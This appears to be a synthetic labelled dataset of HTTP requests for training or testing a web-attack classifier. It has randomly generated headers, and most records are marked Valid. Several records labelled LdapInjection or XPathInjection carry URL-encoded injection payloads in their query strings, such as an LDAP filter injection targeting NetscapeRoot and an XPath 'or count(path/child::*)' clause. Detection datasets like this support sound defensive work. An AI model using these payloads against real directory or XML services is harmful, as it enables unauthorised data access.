Accept-Charset: us-ascii;q=0.7, windows-874;q=0.3, macintosh, ks_c_5601-1987;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=206
Client-ip: 30.242.53.46
Cookie: TdM=9;WUGcmd=08801109;stdin4uEr6IjBWiframeX=kn0;jirs=69
Cookie2: $Version="810"
Date: Mon, 31 May 04 05:25:01 UTC
ETag: "Tm-K.Ph6ExnZ1A-7d"
Expect: thinleo
From: dclye@1rnntrwrw.ch
If-Modified-Since: Fri, 05 May 06 15:44:11 GMT
If-Unmodified-Since: Sat, 29 Apr 06 02:23:06 GMT
If-Match: "2-1F8tCaMUFZet27DEU7"
If-None-Match: "zuAMe6OtWeEdk56"
If-Range: Wed, 12 Sep 07 09:19:19 CET
Max-Forwards: 21
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM ZHNMc09kckVEZTduYnJkaXRpa3NlOXlobnRudEFpaGxsbWllUzFlZTdvb3Fx
Authorization: onqq ebmes4ht=eeaul1ce
Range: 498-,-00,-182003
Referer: http://www.Sglnwl.fr/npnuhoh/7taa1n/eaLaNf.cgi
TE: deflate
Trailer: Transfer-Encoding
User-Agent: H0Sibsht/9.4.5.3
UA-CPU: Sparc
UA-Disp: 3339,068,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6849x3464
Via: 3.0 192.22.171.136:675, 4.1 165.125.186.33
Transfer-Encoding: identity
Upgrade: aw7qe/7.0, Owgd/5.7
Warning: 097 17.27.107.55 "EOwnwUTnuc2fh" "Fri, 20 Aug 04 15:19:36 GMT"
X-Forwarded-For: 92.174.150.38
X-Serial-Number: 15945
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Briietlaatisrf=6&CaeToemv=~dov8sma&iUfafmteiErim=9sanewrcEncsb&td=siE1e2lshsaOR&u6rswz=d3Zq&serr7n=onyim&bElr2zgl5elkh=St eeinsert)d:&arUTeglcns=Sachwejwottnut&nsti7ns=tHWF8&dai1kidattna=s3eohOa&oSr=islsr&aihrtmnarptihe=80384641

End - Id: 4420
Start - Id: 25422
class: Valid
GET /zJmNka7Le/intempj5f.shtml?tenata=pu4fe%260e&8af=hh%2Fo&nsr=el HTTP/1.0
Host: 204.31.112.52
Connection: keep-alive
Accept: image/gif;q=0.3, image/gif
Accept-Charset: *
Accept-Encoding: *
Accept-Language: uelrgr-5iiaIi, lth-deb;q=0.2, rdrIno-ebes
Cache-Control: min-fresh=228
Client-ip: 141.90.56.165
Cookie: 1ufe8shrz=lJYG1;irvrzsocts=8867;Ege=62
Cookie2: $Version="78"
Date: Mon, 23 May 05 06:06:19 UTC
ETag: W/"NuB1T865FwH.zLE"
Expect: eNIat9e5=hialone
From: ledpneia@lcpqUt.de
If-Modified-Since: Tue, 26 Aug 08 01:41:33 GMT
If-Unmodified-Since: Sat, 06 Aug 05 04:07:01 UTC
If-Match: "FlQO9cJN@LxHgab3obJ"
If-None-Match: "7mEwrOqSFDKM7gY8CE4l"
If-Range: "1gHtvqw.a8wkCztO"
Max-Forwards: 34
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: hmMc hcaent=h2ppqntm
Authorization: Digest nc=e9eEf1d1
Range: 06-841799,-16,747140-
Referer: /srwie.msf
TE: trailers,deflate;q=0.9,trailers
Trailer: If-None-Match
User-Agent: iz8pac (twzeggUf; n.lDl_oS@x; 4GKg5V; aUrHmIoYd; c36NpGxFjj)
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 407x092
Via: 6.9 201.130.218.214, chtc/0.5 www.aerutta.js, lrav/3.0 191.30.250.26
Transfer-Encoding: gzip
Upgrade: roti/6.6, neeqsd/9.8, ycfke/5.8, l52ps/7.9, Ahg/7.6
Warning: 257 2.176.158.197 "ifnht" 
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 588564161052
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25422
Start - Id: 33900
class: Valid
PUT /eX1Hi-T/tI70Esad/v3allwinnt/skX2O./cz.tiff? HTTP/1.0
Content-Length: 103
Content-Language: cgr,atxrmn,P
Content-Encoding: compress
Content-Location: /eemyssE/tttea/Sjpy8i.doc
Content-MD5: YWM2cm5pZWkyWGFhaGlucg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 May 06 18:13:59 GMT
Last-Modified: Wed, 08 Feb 06 14:15:05 GMT
Host: www.otwWmn.de:80
Connection: aethoct
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=21
Client-ip: 68.59.175.92
Cookie: el3rose7dEhiq=haEi
Cookie2: $Version="187"
Date: Thu, 25 Mar 10 05:11:25 GMT
ETag: "yty6mQFBlm2dqjw"
Expect: kcer4ecw
From: tietc@t0ytt.net
If-Modified-Since: Mon, 30 Oct 06 09:50:43 CET
If-Unmodified-Since: Tue, 15 Sep 09 02:58:27 GMT
If-Match: "Iq32jRurxosPQgzN"
If-None-Match: "icz-ICVgkrxkAtmMIZH"
If-Range: Sun, 19 Oct 08 11:15:50 CET
Max-Forwards: 7
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest username="3htdpnp1"
Authorization: hCsu toftpss=rdgor8
Range: 7-
Referer: /lersoeaE/inotst2d.tiff
TE: chunked;q=0.7
Trailer: Warning
User-Agent: mMDaIWzAm8 http://www.t9VrOd.fr
UA-CPU: PowerPC
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1982x002
Via: HTTP/8.9 www.ey8esl.shtml
Transfer-Encoding: compress
Upgrade: tiA/0.9, ntKsa/7.2, 7Aeetb/2.3, Eili/1.5, lni/0.9
Warning: 989 201.150.171.195 "ttyrApoieD4se" "Wed, 19 Aug 09 22:23:21 CET"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 6132370347859311136
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

ee=uti3sus3oEahv65&eesscad=6dincludelL;0div  dr>$)6h&siamss=wi&hstda5m=etae1anevteuAns&9ht=0502

End - Id: 33900
Start - Id: 30395
class: Valid
GET /1vn3rce/g5/eNTWfvte6zwr38Qn-g/mz@ka6Q0@R2/wlsas.cgi?ofhnuilr=eeQegLHbUde&-3ncGz7N6=ddRETR&a8COrraie0r=teKyyoEefay&2YzwgTIUy=8576&vJettBadtop=70&liivrumoeNwae=onesiIhethnxIxctsa&atrjNn=t2i&oedsOfiw1ata=66245&tRugd7t7=054135865&teceur=mossseesR&sbatwsPlal=7EEHe%2BuSi%3D5cemn HTTP/1.0
Host: 139.4.67.219:3188
Connection: close
Accept: */*
Accept-Charset: x-mac-ce;q=0.7, cp-932;q=0.5, iso-8859-2
Accept-Encoding: gzip;q=0.8, identity;q=0.1, gzip;q=0.3, compress;q=0.7, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 175.83.52.80
Cookie: Slesja4z=uKVPNhIgh@C;Xm9OSEE0K=49442;WA@Tf=fsnub;7iq7xeher3d6ot=89;VU0OJSBkYbc@=neR~j6m  J>(Aah;i1bLtEenpg=drops
Cookie2: $Version="6"
Date: Mon, 09 Jan 06 06:31:24 GMT
ETag: "hs3nAIXBY4HQpN@pDKq"
Expect: 3eebtu=hoshdehi;pshaoiD
From: eonljol@h9iohse.fr
If-Modified-Since: Sat, 21 Nov 09 07:32:08 UTC
If-Unmodified-Since: Tue, 18 Mar 08 21:05:49 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 19 Apr 07 04:05:28 CET
Max-Forwards: 52
MIME-Version: 1.6
Pragma: t6h2Eee=Lso
Proxy-Authorization: Basic NTZ0ZmRpOmlvbnJmZQ==
Authorization: Basic dWlsdGR0dHM6M2lhem9v
Range: 13594-
Referer: /hNm6l.mp3
TE: chunked
Trailer: Max-Forwards
User-Agent: fisr/5.4.2
UA-CPU: 68000
UA-Disp: 178,649,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9503x4246
Via: 0.5 3.17.187.0, HTTP/9.7 50.4.191.202, FTP/6.1 102.201.244.117:39794
Transfer-Encoding: deflate
Upgrade: cla4n/8.3, fEa/7.5, uMYo/1.3, 8sc2/5.8
Warning: 906 www.li3ogeT.jpg "oo7NnrsaEitoagsnnip" "Wed, 04 Jul 07 09:26:22 UTC"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 157029836
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30395
Start - Id: 1768
class: Valid
GET /3ymFELDJ.zMqw/tYbpEbY623/pLs5upe/ng/nJs2-.6DHiPdjVCtAf/rno/zuo4/8RW/yMOq858bXGaWZSh08cQ.mdb? HTTP/1.0
Host: www.notdhdzra.be
Connection: keep-alive
Accept: audio/x-wav, application/zip;q=0.9, video/quicktime;q=0.7
Accept-Charset: iso-8859-7
Accept-Encoding: 
Accept-Language: thttcE7b-pse;q=0.1, It3-hdeh;q=0.5, h-coroya, dw4-I3oa2ti;q=0.3
Cache-Control: t=r5mOe
Client-ip: 21.72.18.201
Cookie: 6ssptat=1864;wkantacotcd2Ca4=ibinD;nb=ud<et)n[&
Cookie2: $Version="36"
Date: Sat, 03 Jan 04 22:32:39 UTC
ETag: W/"7GnAgn5dfI2h2vH5"
Expect: 8RdKw
From: hoiiT@iran.org
If-Modified-Since: Tue, 16 Feb 10 22:03:23 GMT
If-Unmodified-Since: Mon, 10 Apr 06 11:46:05 GMT
If-Match: "k-roh14x7XESU7Yv_Dp"
If-None-Match: *
If-Range: Fri, 16 Oct 09 08:29:45 CET
Max-Forwards: 11
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM RXBldG1hemFldHVvNm5uNDhwZW9hdWVzb2l0ZXljVHRidGg=
Range: 2506-
Referer: /orbmB54.pdf
TE: deflate
Trailer: Referer
User-Agent: Mozilla/1.5 (X11; U; Open BSD i586 1.0; ce-5e; rv:6.6.3) Gecko/70169535
UA-CPU: PowerPC
UA-Disp: 0437,4015,8
UA-OS: Win9x
UA-Color: color8
Via: 3.3 www.4fmtthod.jpeg:0
Transfer-Encoding: identity
Upgrade: idOaS/2.5, htun/6.1, alo/1.0, cCe/9.8
Warning: 139 78.74.97.56:3343 "baAves6intsOfariudt" "Tue, 24 Nov 09 11:16:38 GMT"
X-Forwarded-For: 162.29.213.245
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1768
Start - Id: 38704
class: LdapInjection
GET /89fz.V1rv/gieboaiisr839oy/iQGz/ddihtee/m2nfDrg/srasaorreenrNteyi/tvaurhssTigt/anFs1.swf?nryrptxccs=%29++%28+%7C+++%28ath%3DrU*%29&bbpdiiamn=8111&poaicihaaetl=9890&.HIftp=Thjsoke%3Aperlsags HTTP/1.1
Host: www.csoaciwacm.cz
Connection: utsc0d
Accept: application/*, image/png
Accept-Charset: euc-cn;q=0.7, x-mac-cyrillic;q=0.5, windows-1258;q=0.4, utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 244.26.7.222
Cookie: haosmgdjnun=2Sgeisdrr;sognue=4951583;yScllknitynhe=tirp8rxneeea3bva
Cookie2: $Version="4"
Date: Mon, 03 Jan 05 17:39:45 UTC
ETag: W/"PVcmfJxnkWU@I6@XHg8W"
Expect: rsracoa
From: lLzaagE6@8ctXe4aie.gov
If-Modified-Since: Sat, 21 Feb 09 07:31:23 CET
If-Unmodified-Since: Fri, 04 Jun 04 03:59:30 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1383
MIME-Version: 5.4
Pragma: 09ws='I0o'
Proxy-Authorization: e7fkmh dlnen=ue3t2
Authorization: NTLM dG5zUG5ycmlhdGl3ZW1scnR0Z3RoZXRyb2tqbGVEdGhhdHRlZTA3aVRyZXBFcjk=
Range: 557810-
Referer: http://www.tbltntl.fr/nee5.mpg
TE: deflate;q=0.3,trailers,trailers
Trailer: If-Modified-Since
User-Agent: oolo (zUPCjJQ6l@)
UA-CPU: PowerPC
UA-Disp: 849,080,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: 3.0 www.tde1aslY.html, 3.4 www.iloee.jpg
Transfer-Encoding: compress
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38704
Start - Id: 5715
class: Valid
PUT /mm5ea/lfVUlDZZycn9ngt-7CF/t2rRc3xkPPZ8SU9/nv8fe_FwaVbg2Hq/tTpCN.asmx? HTTP/1.0
Content-Length: 209
Content-Language: g6rWrti,xno
Content-Encoding: identity
Content-Location: http://www.6cpSloe.biz/ieJesit/heaeInyG/resr6de/rSm5/Tlm17id.tar
Content-MD5: UnNraWZpdHhmdG90YXJtbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Jun 07 14:38:24 UTC
Last-Modified: Sun, 10 Sep 06 07:14:27 CET
Host: www.reaeos81n2.cz:80
Connection: RhMogaeo
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 97.96.118.38
Cookie: ahe=V-;kUOpkKq_r=831642;goohIleaapqttkn=tFgkEF;rytohaevvovtcos=oz_
Cookie2: $Version="32"
Date: Tue, 17 Feb 04 09:02:56 GMT
ETag: "VVGNW8zSXxQI4.C1N"
Expect: yt8eeyi
From: ototLn2u@5heey.uk
If-Modified-Since: Fri, 24 Apr 09 04:11:51 CET
If-Unmodified-Since: Thu, 25 Jan 07 04:40:45 CET
If-Match: *
If-None-Match: "Z7z9g0X.Fh.sD4OE"
If-Range: Wed, 11 Feb 04 23:58:29 UTC
Max-Forwards: 9749
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM d3REVHR0bmlwSW5kbmRtbnJuZWpjOGxvdG82TmRtZW4=
Authorization: Basic b25pN3RsZTpqdWV2c05j
Range: 40090-
Referer: http://www.eeNwdr.com/lir6xl/Othreoip/ai9heu9.mpg
TE: deflate;q=0.3,trailers,gzip
Trailer: Date
User-Agent: csner7hr/3.3.7.2
UA-CPU: Sparc
UA-Disp: 1912,4963,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3416x9061
Via: HTTP/8.3 156.88.239.47, HTTP/4.0 www.oant.htm, yo2e5q/6.8 www.idyo4do.css:07957
Transfer-Encoding: deflate
Upgrade: 3ewae6/1.5, hmdtw/9.4, ubskbu/3.6, Dntijt/2.7
Warning: 932 84.207.154.52 "lweaeiRmollF5" "Sun, 27 Nov 05 06:11:04 UTC"
X-Forwarded-For: 15.65.145.193
X-Serial-Number: 7835393170
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

QyjOpd-=11&sinoINeoitsk=2n9iHmQ@_Cp&shutdownW-fa=e0u:bb:&i4yeiairrn=Zo7Sierxrnzreec&xjbh95rsloeT=2541&tasLNpe=iba1ddarozaooceaee&ltt3e=1&Mg.Siframe2documentBW=os5m7ldoe8rN&xtermMtHJ=2&8dountro=2gds8\ye

End - Id: 5715
Start - Id: 11792
class: Valid
GET /e0/hercissotdzeiibncrt/hlBskyp/otMHKc4M6/t0nzzeDt/Q8mJYMe3hvbYim/ttperiimlrAtc/Z5pUTcmdqnCG.php?rsftel=4818&aRr6s6eh5x=oai&siei1tPn=abr&orrefe4rF=s5AHIAQ3&2lo0n95nweewHl=nute+iom1&rJlLZ3ON_MG=48286163&rpwemsbfac=bbtz7tia6eof&aersbn=a+aosotra%242passthru&eq9L2uuur=n%7Exhz&0-HHwYkm=06191&wuhmlttv5=uwgDe HTTP/1.1
Host: www.Haqwt.de
Connection: close
Accept: */*
Accept-Charset: euc-kr, utf-7;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=59
Client-ip: 77.107.19.21
Cookie: lfesmn=Aste
Cookie2: $Version="251"
Date: Sun, 05 Nov 06 24:00:41 GMT
ETag: "z0_yBLGoix@aBdRH"
Expect: 100-continue
From: tnsjx@nvlaoadtiu.st
If-Modified-Since: Sat, 28 Jan 06 06:59:29 CET
If-Unmodified-Since: Sun, 23 Nov 08 09:13:07 GMT
If-Match: *
If-None-Match: "oFhCaGcY30ugvilJa90"
If-Range: "lUMlRVioo62o_WPbf"
Max-Forwards: 1
MIME-Version: 0.0
Pragma: todw4exm=ud
Proxy-Authorization: Digest cnonce="enggiity"
Authorization: Basic dG9kckl1Om5zbVR0dXA=
Range: 9732-
Referer: http://raaoBr9g.fr/jtSlsri.htm
TE: chunked;q=0.9,chunked;q=0.0
Trailer: From
User-Agent: oNggunAVd0 http://www.salYuX.fr
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0954x9922
Via: 0.3 www.os0ashaz.jpeg
Transfer-Encoding: identity
Upgrade: meE/0.7
Warning: 010 93.171.200.42 "zs5dwspM1loAab" 
X-Forwarded-For: 92.235.100.67
X-Serial-Number: 89221086551285
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11792
Start - Id: 38592
class: LdapInjection
GET /dw/mei/eeukteibctg9rsIsxas/CM5zEuVF/1M7di8gzjO1c_dFV/na0cteg3e5ftss9hni/cl8jxVPsVveggLs70/pmt/rFjxHRnu@x5/lasnor5Slwd34t.css?g3rS9sty4ih7=0zMbkX5TN&IrDmron=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.xdErsyaUos.com:28
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.6, gzip;q=0.2
Accept-Language: sqnfst-6e2emtsh, lioemnh-Wt4ret;q=0.7
Cache-Control: max-stale
Client-ip: 165.158.133.130
Cookie: Yvc-TLZIz7M_=9271523073;vbse1onda=dNgvMI;dpashssiiti=gsVq1wPelmfX;itx=ifhttpseo
Cookie2: $Version="61"
Date: Sat, 22 Dec 07 09:04:42 GMT
ETag: "-JtG7_R7TXsAf9DYaiP"
Expect: 100-continue
From: Henr0sl4@nexht.fr
If-Modified-Since: Thu, 13 Jul 06 13:55:09 UTC
If-Unmodified-Since: Thu, 15 Jan 04 11:46:10 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 17 Aug 07 02:28:34 GMT
Max-Forwards: 3
MIME-Version: 7.0
Pragma: uPedkas='aatan4di'
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: NTLM OG9zY2hzc2F4c25zZXlyaW44RWV2YXBlZlM2bW92dzRBcnN5cGNpZXRsZXM=
Range: -348176
Referer: http://intik.ch/pizelos/ooeraiSp/isbci/E1ptuntr.dll
TE: trailers,gzip;q=0.3
Trailer: If-Range
User-Agent: lsSotoE2mb
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2971x6869
Via: FTP/2.3 209.176.240.142
Transfer-Encoding: identity
Upgrade: teh/3.7, eErn/1.4, yrgp42/8.0, 3Ets/1.6
Warning: 494 www.yte1Tn.shtml "iewe" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 379109696738614
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38592
Start - Id: 7314
class: Valid
POST /svd/tpsweislNs3rEldd/iJ5QUPtuEZ9Rl7H24/s7Isf/JJpanda4hGFinputshutdownXHz/xitIyteHS-8Qc/iyfzhtr/qesnSehyofpeaeha/vdae06.mspx? HTTP/1.1
Content-Length: 188
Content-Language: dYd3e,t
Content-Encoding: identity
Content-Location: /utreue1c.msf
Content-MD5: ZFRyZTdiZmFlY2Y0cmlobg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Feb 06 01:39:43 UTC
Last-Modified: Sat, 06 Mar 04 12:12:19 GMT
Host: 88.68.2.255
Connection: close
Accept: application/*, video/quicktime;q=0.4
Accept-Charset: iso-2022-jp;q=0.2, x-mac-greek, shift_jis, iso-8859-9;q=0.0, euc-cn;q=0.5
Accept-Encoding: deflate;q=0.4, compress;q=0.8, gzip;q=0.9
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 10.100.202.44
Cookie: T3serxqo8Htrin=gMgTBSLh;m4r3l=ioO7;isgohlledeict=twe;stcneasi=oO.;snorcl0ielnoae=oMge;zN=|pee;
Cookie2: $Version="8"
Date: Fri, 05 Aug 05 17:29:42 GMT
ETag: "FgSztvxaqUPUoUZP"
Expect: lydn
From: ha4h@ntbt8vhFn.cz
If-Modified-Since: Mon, 04 May 09 24:54:30 CET
If-Unmodified-Since: Tue, 25 Dec 07 13:25:31 UTC
If-Match: *
If-None-Match: "OZ-XOo--0RnGwurmSi"
If-Range: Thu, 13 Apr 06 03:17:08 UTC
Max-Forwards: 947
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest nc=56A8c8A0
Range: 843670-7300,78-
Referer: /bslyzhl/ClEy/tvaf/T6rSrnh/te4K.cfm
TE: trailers,chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: Mozilla/4.1 (compatible; MSIE 7.3; Win98; uazi; aaPleg)
UA-CPU: 68000
UA-Disp: 4520,707,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1302x7380
Via: 6.0 www.eswnIAn.png
Transfer-Encoding: gzip
Upgrade: Pcr/6.7, asmrbh/9.1, ayi/9.1
Warning: 465 193.0.29.240 "9tdbganttoetamdoth" 
X-Forwarded-For: 180.148.168.191
X-Serial-Number: 83189870004796915
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ae=et2ncstwisehr3&ncaaieTtn4=htpassha&bsoybrrs=04037625&ocrer=2114&9Cjprocessing-instruction=632192039&bnssraAijNdaen=17680&etlsnnmfsach3d=t&5e7olm=u2elgsi&osPdt7Hdoe=589946&eJlhyntir=1744

End - Id: 7314
Start - Id: 7964
class: Valid
PUT /tTZ-Qnts3sn/4Cmtwprocessing-instruction/eoegssrdehoe/qflR-Bnhma/ghIhys8/q.C/tl3cv05pxmcgWhcjM/VdSI/Gv.php3? HTTP/1.0
Content-Length: 90
Content-Language: nyNeJre5
Content-Encoding: gzip
Content-Location: http://www.uie2.it/ehn1ion/lturiIEs/3eeay.tiff
Content-MD5: dG5Sd2VhaG5oc1RCTHBldA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Mar 04 11:05:28 CET
Last-Modified: Thu, 08 Feb 07 02:00:38 GMT
Host: www.2it4lewa.org
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-cyrillic
Accept-Encoding: compress, identity;q=0.3
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 244.62.195.136
Cookie: rqrF5uGK1=m8ccS23o;openDh14gZ05EZ=rs0;ata2kn=2;bmerbctonnatth=5 t dkh?0vvE p
Cookie2: $Version="0"
Date: Tue, 27 Apr 10 08:59:35 GMT
ETag: W/"OtIb4q6xgkVt7XZZXA"
Expect: 100-continue
From: eedf0au@eYilizod8t.de
If-Modified-Since: Sun, 05 Aug 07 12:01:16 UTC
If-Unmodified-Since: Tue, 06 Mar 07 08:26:41 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Apr 08 09:16:05 GMT
Max-Forwards: 912
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest response="a2C814F4b16fc2F09cDaA0d046FBdB04"
Authorization: Digest uri=http://www.scnaa.gov/eTdEwsi.mdb
Range: -57827,6032-4
Referer: http://www.l6e5Ai.org/letRu/olallsnq/icnsrei.html
TE: trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/2.0 (X11; U; Linux i586 9.4; up-JL; rv:4.3.4) Gecko/63303590
UA-CPU: MIPS
UA-Disp: 4676,8640,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 094x6003
Via: 9.6 www.bvnnex.js, HTTP/0.8 101.80.146.183, 0.3 21.6.48.1
Transfer-Encoding: compress
Upgrade: rRndxQ/4.8, m7j2ro/0.4, xec/7.9, aPodde/0.0, lld/6.5
Warning: 583 50.58.211.108 "lh5crmtllesSieanni" "Mon, 08 Jan 07 08:44:59 UTC"
X-Forwarded-For: 8.49.98.213
X-Serial-Number: 56493
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

Jndulso0l=53315&gl9tu=oHfltS>A7&nbseeennolika=eE&hei=175943&bGf=959676454&eeasrvy=gIda7A

End - Id: 7964
Start - Id: 49981
class: XPathInjection
GET /5ecqz0ae4aedt/abHnO9eloeO99b/sat/@P-Hu/rciswcx04BZMvKwf/hnnh2t/o@l/tuTZP/EQJeXXOyF8wE9W/Tmmeviar5e/aYKF8EDfoq.jpg?4WzBXJT5T0includev=zsrYi%27+or+6++++%3C++++count%28path%2Fchild%3A%3A*%29++or+++++%275cdn%27+%3D+++%27&efi=889&iamnpnDto=ex7s&ftpM3E=viae HTTP/1.1
Host: 211.92.51.52:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-chinesesimp;q=0.1, windows-1257;q=0.7
Accept-Encoding: gzip, identity;q=0.2, deflate
Accept-Language: *;q=0.0
Cache-Control: min-fresh=38
Client-ip: 156.223.154.24
Cookie2: $Version="372"
Date: Thu, 27 Nov 08 12:50:41 UTC
ETag: W/"o_kvEAaAscQ3k6U"
Expect: etuerprO
From: aihryej@wvtazei.be
If-Modified-Since: Fri, 06 Oct 06 02:54:24 CET
If-Unmodified-Since: Tue, 29 Nov 05 01:46:08 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 20 Jun 07 12:03:19 GMT
Max-Forwards: 82
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: lIa6N tRl9n=obihRto
Authorization: NTLM eUNnaWxmTEFzbm9hRTFlaW5lb25sZ3NobGVseHNoc29rbm9k
Range: 30900-
Referer: /hAlnwoet/m4oSatl/uDvde4/p6saWsTa.mspx
TE: deflate;q=0.9,deflate
Trailer: User-Agent
User-Agent: Mozilla/9.8 (Windows; U; WinNT 1.5; FR-ai; rv:8.5.4) Gecko/38432589
UA-CPU: 68000
UA-Disp: 1888,408,16
UA-OS: Linux
Via: 4ur/7.0 www.rrhcmn.jpeg:6550, 2.6 125.62.24.218:756
Transfer-Encoding: deflate
Warning: 265 www.raemriNe.tiff "tniraa8ta" 
X-Forwarded-For: 10.220.189.114
X-Serial-Number: 80680664480083663
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49981
Start - Id: 7673
class: Valid
PUT /huei/4pjwa1sdecdbGixeaO/vwhereallautoexecb/krtttbdstdhDaendoOo/Az/mnrrdimnn/t5eGmilrsEtr/eraA/nRxalnsidi/obhriIgn.sh? HTTP/1.1
Content-Length: 162
Content-Language: 0iis,smt2,ah
Content-Encoding: gzip
Content-Location: http://esNes.uk/tlxtr8w/Cr6enk/l1scer/7o4vce3.mp3
Content-MD5: TW9lbHdHYmxsbGFpdHhuMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Jul 05 07:38:45 UTC
Last-Modified: Mon, 30 Jan 06 15:36:52 CET
Host: 222.115.1.252
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.2, windows-1254;q=0.3, euc-kr;q=0.9, x-mac-chinesesimp;q=0.8, iso-8859-4;q=0.8
Accept-Encoding: 
Accept-Language: ssnftt9-teeoaean;q=0.6, 7ieS-hini, tr7gea-Cet, v-n5HSEb
Cache-Control: max-stale=5154
Client-ip: 41.206.202.253
Cookie: h0aTV4V=nODc;QQ7RL06rZMexec=89;lta4fe=9
Cookie2: $Version="46"
Date: Fri, 26 May 06 05:23:02 UTC
ETag: W/"5IE9rBjdiYylKEB"
Expect: 100-continue
From: iein@nruizurNh.it
If-Modified-Since: Sat, 03 May 08 03:14:36 GMT
If-Unmodified-Since: Fri, 10 Dec 04 15:15:36 CET
If-Match: "eVdA9nRfKUt_nT4L_f"
If-None-Match: "rSP6pjI-OU2CAqGJN"
If-Range: Sat, 14 Oct 06 04:28:40 CET
Max-Forwards: 4483
MIME-Version: 4.9
Pragma: rybVeDse=d
Proxy-Authorization: uocnn dT6my=esqesaq
Authorization: Digest cnonce="eNtto"
Range: 3057-62032,67283-,-7611
Referer: http://www.ussomKhr.uk/emo8i/Tcentka/hgb4ikn.wav
TE: deflate
Trailer: Accept
User-Agent: oeeEodoji/7.5.3.1
UA-CPU: StrongARM
UA-Disp: 5950,8626,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0413x678
Via: HTTP/3.3 244.215.235.106, 8.9 www.trrrtat.js
Transfer-Encoding: gzip
Upgrade: reasrf/4.1
Warning: 953 www.sgtzoeOm.png:0 "musiwDeiogabd1ld" "Fri, 16 Jan 04 11:28:31 GMT"
X-Forwarded-For: 116.49.9.190
X-Serial-Number: 117057517
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

tnawyshh=52&oteNh5n=6bo-AeE-&9ae=etsFP&rsuiul=a1voBdt&j-IWMg1QmJq=2695&diu=gc8&cQOa-Sc2EOi=918&lse7rca=bratDnunetcatOyta &isArasqthbhya=63312023&Ldwfs9yr=91658797

End - Id: 7673
